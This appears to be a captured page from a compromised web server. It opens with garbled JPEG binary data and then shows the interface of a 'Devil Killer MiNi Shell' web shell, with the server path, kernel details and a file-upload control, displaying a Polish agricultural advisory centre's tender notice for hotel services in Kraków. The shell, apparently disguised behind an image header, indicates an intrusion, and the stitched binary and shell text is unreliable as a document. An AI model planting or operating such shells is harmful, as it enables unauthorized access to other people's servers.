JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211005/0021000201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa usługa hotelowa w ramach dwóch, <br/>następujących po sobie, dwudniowych szkoleń <br/>pn. Broker innowacji doradcą XXI wieku w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Doradztwa Rolniczego w Brwinowie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Centrala w Brwinowie, Oddział w Krakowie, Oddział w Poznaniu, Oddział w Radomiu,Oddział w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015900539</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pszczelińska 99</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brwinów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 274 23 22</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">warszawa@cdr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cdr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa jednostka organizacyjna posiadająca osobowość prawną </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Doradztwo rolnicze </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa usługa hotelowa w ramach dwóch, <br/>następujących po sobie, dwudniowych szkoleń <br/>pn. Broker innowacji doradcą XXI wieku w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-facd0cab-25d0-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00210002</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011944/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Usługi hotelarskie krajowe, w tym restauracyjne i najem sal wykładowych na potrzeby Centrum Doradztwa Rolniczego w Brwinowie (zamówienie udzielane w częściach)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Schemat II Pomocy Technicznej „Krajowa Sieć Obszarów Wiejskich” Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cdr-brwinow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cdr-brwinow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Pełen<br/>opis wymagań techn. i org. dot. korespondencji elektronicznej znajduje się w Rozdz. VI SWZ. W<br/>Ogłoszeniu zawarto wyciąg z SWZ ze względu na ograniczenie ilości możliwych do wprowadzenia<br/>znaków.<br/>1. W postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym a Wykonawcami może odbywać przy użyciu platformy zakupowej Marketpalnet, zwanej<br/>dalej Platformą – pod adresem https://cdr-brwinow.ezamawiajacy.pl/ przy użyciu zakładki<br/>„Korespondencja”.<br/>2. Korzystanie z Platformy jest bezpłatne. Instrukcja korzystania z Platformy dostępna jest po utworzeniu konta i znajduje się w zakładce Baza wiedzy – Instrukcja dla<br/>Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych<br/>osobowych jest Dyrektor Centrum Doradztwa Rolniczego (zwane dalej „CDR”) z siedzibą w Brwinowie<br/>(05-080) przy ul. Pszczelińskiej;<br/>2. w CDR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan<br/>skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail:<br/>iodo@cdr.gov.pl lub pisemnie na adres naszej siedziby wskazany w pkt 1;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego;<br/>1) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74-76 ustawy z dnia 11 września 2019 r. - Prawo<br/>zamówień publicznych (Dz. U. z 2019 poz. 2019 z późn. zm.), zwanej dalej „ustawą Pzp”;<br/>4. Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78-79 ustawy Pzp;<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6. posiada Pani/Pan:<br/>· na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących oraz<br/>otrzymania ich kopii;<br/>· na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>· na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>· prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>7. nie przysługuje Pani/Panu:<br/>· w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>· prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>· na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>9. podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani<br/>zobowiązany/a do ich podania, a konsekwencją niepodania danych osobowych będzie niemożność<br/>oceny oferty i zawarcia umowy;<br/>10. administrator danych nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa hotelowa świadczona w Krakowie, obejmująca usługi noclegowe, restauracyjne, najem i obsługę techniczną dwóch sal konferencyjnych oraz miejsc parkingowych dla organizatorów, prelegentów i uczestników dwóch, dwudniowych szkoleń pn. Broker innowacji doradcą <br/>XXI wieku, z terminem realizacji usług:<br/>•	dla organizatorów i prelegentów 14-18.11.2021 r., <br/>•	dla pierwszej 50 osobowej grupy szkoleniowej (łącznie liczba organizatorów, prelegentów <br/>i uczestników) w terminie 15-16.11.2021 r.,<br/>•	dla drugiej 50 osobowej grupy szkoleniowej (łącznie liczba organizatorów, prelegentów <br/>i uczestników) w terminie 17-18.11.2021 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55100000-1 - Usługi hotelarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-11-14 do 2021-11-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert:<br/>1) Cena brutto wykonania zamówienia 60 %,<br/>2) Standard obiektu, w którym świadczone mają być usługi 12 %,<br/>3) Dodatkowe danie ciepłe w ramach kolacji 16 %,<br/>4) Deser do każdego obiadu serwowanego w ramach szkoleń 12 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Standard obiektu, w którym świadczone mają być usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe danie ciepłe w ramach kolacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deser do każdego obiadu serwowanego w ramach szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy, którego wzór stanowi Załącznik nr 2 do SWZ<br/>Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia<br/>stanowi Załącznik nr 3 do SWZ<br/>Pełnomocnictwo do złożenia ofert, jeśli ofertę składa pełnomocnik.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>Wykazanie, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa<br/>(o ile dotyczy) w osobnym pliku;<br/>Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>i Informacji Działalności Gospodarczej lub innego właściwego rejestru - składaną<br/>w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy (lub Wykonawców wspólnie<br/>ubiegających się o udzielnie zamówienia lub podmiotu udostępniającego zasoby) jest<br/>umocowana do jego reprezentowania, przy czym Wykonawca nie jest zobowiązany do złożenia<br/>tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych<br/>ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z ww. dokumentów, Wykonawca obowiązany jest złożyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu<br/>udostępniającego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość złożenia oferty wspólnej przez dwóch lub więcej<br/>Wykonawców (patrz art. 58 ustawy Pzp) pod warunkiem, że oferta ta będzie spełniać<br/>następujące wymagania:<br/>1. Wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>3. Wszelka korespondencja będzie prowadzona przez Zamawiającego tylko<br/>z pełnomocnikiem, którego należy wskazać w Formularzu oferty.<br/>4. Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, umowa spółki cywilnej),<br/>z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>5. Oświadczenie o niepodleganiu wykluczeniu Wykonawcy z postępowania składa każdy ze<br/>wspólnie ubiegających się Wykonawców.<br/>6. Zamawiający nie zastrzega obowiązku osobistego wykonania przez jednego<br/>z Wykonawców kluczowych części zamówienia.<br/>[ZOBACZ W SWZ] <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Siła wyższa<br/>1. W przypadku, gdy na skutek pochodzącego od służb państwowych lub organów władzy<br/>publicznej nakazu, zakazu, polecenia, zalecenia, decyzji lub innej podstawy formalnoprawnej nie<br/>będzie możliwe wykonanie usług objętych niniejszą Umową na warunkach w niej wskazanych,<br/>Zamawiający ma prawo do zmiany terminu rezerwacji na termin uzgodniony z Wykonawcą<br/>(maksymalnie w terminie do 30.10.2022 r.), po ustaniu wyżej wymienionego zakazu / nakazu /<br/>polecenia / zalecenia / decyzji lub innej postawy formalnoprawnej albo do rezygnacji z realizacji<br/>umowy, przy czym wybór z którego uprawnienia skorzysta należy do Zamawiającego.<br/>2. W przypadku, gdy na skutek pochodzącego od służb państwowych lub organów władzy<br/>publicznej nakazu, polecenia, zalecenia, decyzji lub innej podstawy formalnoprawnej, zostaną<br/>wprowadzone ograniczenia, które spowodują, że zaplanowane Wydarzenie nie może się odbyć<br/>Ogłoszenie nr 2021/BZP 00205981/01 z dnia 2021-10-05<br/>2021-10-05 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>według dotychczasowych uzgodnień, w szczególności w sytuacji, gdy wprowadzone<br/>ograniczenia spowodują konieczność zmiany sposobu świadczenia części usług, wchodzących<br/>w zakres zaplanowanego wydarzenia lub zmniejszenia limitu osób uczestniczących w tego typu<br/>wydarzeniach, Strony oświadczają, że dołożą wszelkich starań, aby zorganizować Wydarzenie<br/>w dotychczas zaplanowanym terminie z uwzględnieniem wydanych przez właściwe organy<br/>wytycznych lub zaleceń. Jednakże w sytuacji, gdy ze względu na charakter imprezy, nie byłoby<br/>możliwe zorganizowanie Wydarzenia w zaplanowanym kształcie z uwzględnieniem wydanych<br/>przez właściwe organy zaleceń oraz wytycznych, Zamawiający ma prawo do zmiany terminu<br/>rezerwacji na termin uzgodniony z Wykonawcą po ustaniu wprowadzonych ograniczeń albo do<br/>rezygnacji z realizacji umowy, przy czym wybór z którego uprawnienia skorzysta należy do<br/>Zamawiającego.<br/>3. Wystąpienie siły wyższej zwalnia obie Strony umowy, z odpowiedzialności związanej z<br/>realizacją niniejszej Umowy. Jako ”siłę wyższą” rozumie się: kataklizmy sił przyrody, wojny,<br/>strajki, lokauty, zarządzenia władz, decyzje administracyjne, odwołanie organizacji imprez z<br/>powodu zagrożenia epidemicznego albo stanu epidemii lub stanu nadzwyczajnego, zagrożenia<br/>interesu publicznego itp., których Strony nie mogły przewidzieć i nie znały w chwili podpisania<br/>niniejszej Umowy.<br/><br/><br/>Zamawiający przewiduje możliwość wprowadzenia do Umowy zmiany terminu wykonania<br/>przedmiotu umowy w przypadku:<br/>1) zaistnienia obiektywnych przeszkód technicznych lub innych okoliczności i zdarzeń<br/>uniemożliwiających realizację Umowy w wyznaczonym terminie, na które Strony nie miały<br/>wpływu i których nie mogły przewidzieć w chwili zawierania Umowy,<br/>2) zaistnienia działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub<br/>cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych które mogą być<br/>spowodowane użyciem ich przez Wykonawcę,<br/>3) zaistnienia siły wyższej, np. klęski żywiołowej, huraganu, pandemii, powodzi, trzęsienia ziemi,<br/>buntu, niepokoju, strajku, okupacji budowy przez osoby inne niż pracownicy Wykonawcy,<br/>4) czasu niezbędnego w celu realizacji zmienionego zakresu prac lub w celu uwzględnienia<br/>wprowadzonych zmian organizacyjnych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://cdr-brwinow.ezamawiajacy.pl lub https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-10</span></h3>

